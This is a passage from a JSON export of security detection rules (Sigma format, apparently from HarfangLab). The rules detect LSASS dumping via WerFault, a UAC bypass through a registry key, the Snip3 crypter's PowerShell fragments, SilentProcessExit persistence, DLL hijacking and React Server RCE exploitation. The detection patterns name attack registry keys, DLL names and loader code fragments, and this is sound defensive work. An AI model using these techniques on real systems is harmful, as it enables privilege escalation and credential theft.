"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "13384352-88eb-420b-a83a-24445d5a52c4",
"rule_name": "Possible LSASS Shtinkering Detected",
"rule_description": "Detects LSASS Shtinkering, a technique that consists in sending an Exception Report to the WerFault process, that will in turn dump the process' memory if the environment is correctly set up.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to investigate and find the process responsible for the LSASS Shtinkering as well as to conduct memory forensics to determine the extracted credentials.\n",
"rule_creation_date": "2023-04-03",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "13754f19-10c9-40db-935a-4043b68e2ffd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092489Z",
"creation_date": "2026-03-23T11:45:34.092492Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092496Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://twitter.com/hfiref0x/status/928869933035020288"
],
"name": "t1548_002_prepare_uac_bypass_icolordataproxy.yml",
"content": "title: IColorDataProxy COM UAC Bypass Prepared\nid: 13754f19-10c9-40db-935a-4043b68e2ffd\ndescription: |\n Detects the preparation of the display color calibration UAC bypass, involving the setting of a registry key.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://twitter.com/hfiref0x/status/928869933035020288\ndate: 2020/10/14\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration\\DisplayCalibrator'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n filter_legitimate:\n # Legitime value set by Windows\n Details: '%SystemRoot%\\System32\\DCCW.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "13754f19-10c9-40db-935a-4043b68e2ffd",
"rule_name": "IColorDataProxy COM UAC Bypass Prepared",
"rule_description": "Detects the preparation of the display color calibration UAC bypass, involving the setting of a registry key.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-14",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "13b86531-8b7b-4ef9-bb5a-3d56f788744b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607132Z",
"creation_date": "2026-03-23T11:45:34.607135Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607142Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time",
"https://attack.mitre.org/software/S1086/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_snip3_crypter_detected.yml",
"content": "title: Snip3 Crypter Detected\nid: 13b86531-8b7b-4ef9-bb5a-3d56f788744b\ndescription: |\n Detects common PowerShell snippets present in Snip3 Crypter, a multi-stage remote access trojan (RAT) loader that has been used since at least 2021.\n Snip3 is a sophisticated Crypter-as-a-Service crypter that has been used to obfuscate and load numerous strains of malware including AsyncRAT, RevengeRAT, AgentTesla and more.\n It is recommended to investigate the PowerShell script to determine its legitimacy.\nreferences:\n - https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time\n - https://attack.mitre.org/software/S1086/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/11/12\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.execution\n - attack.t1059.001\n - attack.t1059.005\n - attack.command_and_control\n - attack.t1104\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Snip3\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Obfuscation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n PowershellCommand|contains|all:\n - 'Add-Type -AssemblyName Microsoft.VisualBasic'\n - '[System.Text.Encoding]::Default.GetString(@('\n - '[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath('\n - ' = [Microsoft.VisualBasic.Strings]::Split((Get-WMIObject win32_operatingsystem).name,\"|\")[0]'\n - ' [System.Convert]::ToString((get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID))'\n - ' Start-Sleep -Milliseconds '\n\n selection_2:\n PowershellCommand|contains|all:\n - 'function DropToStartup() {'\n - '[System.Text.Encoding]::Default.GetString(@('\n\n condition: 1 of selection_*\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "13b86531-8b7b-4ef9-bb5a-3d56f788744b",
"rule_name": "Snip3 Crypter Detected",
"rule_description": "Detects common PowerShell snippets present in Snip3 Crypter, a multi-stage remote access trojan (RAT) loader that has been used since at least 2021.\nSnip3 is a sophisticated Crypter-as-a-Service crypter that has been used to obfuscate and load numerous strains of malware including AsyncRAT, RevengeRAT, AgentTesla and more.\nIt is recommended to investigate the PowerShell script to determine its legitimacy.\n",
"rule_creation_date": "2024-11-12",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1059.005",
"attack.t1104",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "14032905-0b18-4b4a-851c-3fafff461ba1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076139Z",
"creation_date": "2026-03-23T11:45:34.076141Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076146Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit",
"https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/",
"https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html",
"https://attack.mitre.org/techniques/T1546/012/"
],
"name": "t1546_012_persistence_using_silent_process_exit.yml",
"content": "title: Possible SilentProcessExit Registry Persistence Added\nid: 14032905-0b18-4b4a-851c-3fafff461ba1\ndescription: |\n Detects a change in a SilentProcessExit configuration in the registry, possibly indicative of persistence using Silent Process Exit Monitoring.\n Silent Process Exit happens when a process is terminated gracefully, by itself or another process. Windows allows user to trigger events in case of a Silent Process Exit.\n Attackers can therefore use this feature as a persistence mechanism to start malicious programs when a Silent Process Exit happens on the system.\n It is recommended to analyze the process responsible for the registry modification and to analyze the file pointed to by the registry value to look for malicious content or actions.\nreferences:\n - https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit\n - https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/\n - https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html\n - https://attack.mitre.org/techniques/T1546/012/\ndate: 2022/09/19\nmodified: 2025/03/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n\n selection_silence_process_exit:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\\*\\MonitorProcess'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\\*\\ReportingMode'\n\n selection_image_options:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\\\*\\GlobalFlag'\n Details: 'DWORD (0x000002??)'\n\n exclusion_empty:\n Details: '(Empty)'\n\n exclusion_msiexec:\n ProcessCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\streem.exe\\GlobalFlag'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\BoxUI.exe\\GlobalFlag'\n\n exclusion_captureone:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\CaptureOne.Win.*.tmp'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\captureone.exe\\ReportingMode'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\captureone.exe\\GlobalFlag'\n\n exclusion_ManagerAdmin:\n ProcessImage: '?:\\Program Files\\Dassault Systemes\\\\*\\win_b??\\code\\bin\\DSYSysIRManagerAdmin.exe'\n ProcessSigned: 'true'\n ProcessInternalName: 'DSYSysIRManagerAdmin.exe'\n ProcessSignature|contains: 'DASSAULT'\n\n exclusion_adobe:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\Adobe\\Adobe Desktop Common\\HDBox\\Setup.exe'\n - '?:\\Program Files (x86)\\Common Files\\Adobe\\Adobe Desktop Common\\HDBox\\Setup.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Illustrator.exe\\GlobalFlag'\n ProcessSigned: 'true'\n ProcessSignature|contains: 'Adobe Inc.'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "14032905-0b18-4b4a-851c-3fafff461ba1",
"rule_name": "Possible SilentProcessExit Registry Persistence Added",
"rule_description": "Detects a change in a SilentProcessExit configuration in the registry, possibly indicative of persistence using Silent Process Exit Monitoring.\nSilent Process Exit happens when a process is terminated gracefully, by itself or another process. Windows allows user to trigger events in case of a Silent Process Exit.\nAttackers can therefore use this feature as a persistence mechanism to start malicious programs when a Silent Process Exit happens on the system.\nIt is recommended to analyze the process responsible for the registry modification and to analyze the file pointed to by the registry value to look for malicious content or actions.\n",
"rule_creation_date": "2022-09-19",
"rule_modified_date": "2025-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "14b8dddd-67f2-4c76-b54c-d77daec6b252",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627205Z",
"creation_date": "2026-03-23T11:45:34.627208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627212Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1564_suspicious_recycle_bin.yml",
"content": "title: Suspicious Process Executed from Recycle Bin Folder\nid: 14b8dddd-67f2-4c76-b54c-d77daec6b252\ndescription: |\n Detects a suspicious execution from Recycle Bin folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2025/01/28\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\\\?Recycle.Bin\\'\n\n # This is handled by the rule 04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44\n filter_deleted_file:\n Image|startswith: '?:\\\\?Recycle.Bin\\S-1-5-21-*\\$R'\n\n # Teams updater doing weird things\n exclusion_teams:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "14b8dddd-67f2-4c76-b54c-d77daec6b252",
"rule_name": "Suspicious Process Executed from Recycle Bin Folder",
"rule_description": "Detects a suspicious execution from Recycle Bin folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n",
"rule_creation_date": "2025-01-28",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1564"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "14c2f793-59ba-4331-86c7-8146946b4943",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591425Z",
"creation_date": "2026-03-23T11:45:34.591429Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591437Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msra.yml",
"content": "title: DLL Hijacking via msra.exe\nid: 14c2f793-59ba-4331-86c7-8146946b4943\ndescription: |\n Detects potential Windows DLL Hijacking via msra.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msra.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\NDFAPI.DLL'\n - '\\SspiCli.dll'\n - '\\USERENV.dll'\n - '\\UxTheme.dll'\n - '\\wdi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "14c2f793-59ba-4331-86c7-8146946b4943",
"rule_name": "DLL Hijacking via msra.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msra.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "14c9835b-73bc-4bc6-a202-6591317a11fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082369Z",
"creation_date": "2026-03-23T11:45:34.082371Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082375Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vmnat.yml",
"content": "title: DLL Hijacking via vmnat.exe\nid: 14c9835b-73bc-4bc6-a202-6591317a11fb\ndescription: |\n Detects potential Windows DLL Hijacking via vmnat.exe from VMware.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/05/16\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vmnat.exe'\n ProcessSignature: 'VMware, Inc.'\n ImageLoaded|endswith: '\\shfolder.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "14c9835b-73bc-4bc6-a202-6591317a11fb",
"rule_name": "DLL Hijacking via vmnat.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vmnat.exe from VMware.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-05-16",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628587Z",
"creation_date": "2026-03-23T11:45:34.628589Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628593Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_potential_react_server_rce_exploitation_linux.yml",
"content": "title: Potential React-Server RCE Exploitation (Linux)\nid: 14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80\ndescription: |\n Detects suspicious command-line related to the exploitation of the React Server vulnerability (CVE-2025-55182).\n CVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\n It is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\nreferences:\n - https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/12/05\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CVE-2025-55182\n - classification.Linux.Exploit.React2Shell\n - classification.Linux.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n ParentCommandLine|startswith: 'next-server'\n\n exclusion_legitimate_subprocesses:\n CommandLine|contains:\n # MISP\n - '/var/www/MISP/app/Console'\n # Jest worker\n - '/next/dist/compiled/jest-worker/'\n # Supercronic\n - 'supercronic -quiet /app/docker/cronjobs'\n # PostCSS\n - '.next/dev/build/postcss.js'\n - 'cat /proc/mounts'\n - 'cat /proc/stat'\n - 'df -kPT'\n - 'df -lkPTx'\n - 'node */.next/transform.js'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80",
"rule_name": "Potential React-Server RCE Exploitation (Linux)",
"rule_description": "Detects suspicious command-line related to the exploitation of the React Server vulnerability (CVE-2025-55182).\nCVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\nIt is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\n",
"rule_creation_date": "2025-12-05",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1548f31b-b093-436b-a9cb-97bc28e00de7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088839Z",
"creation_date": "2026-03-23T11:45:34.088841Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088845Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_persistence_file_startup_phishing_attack.yml",
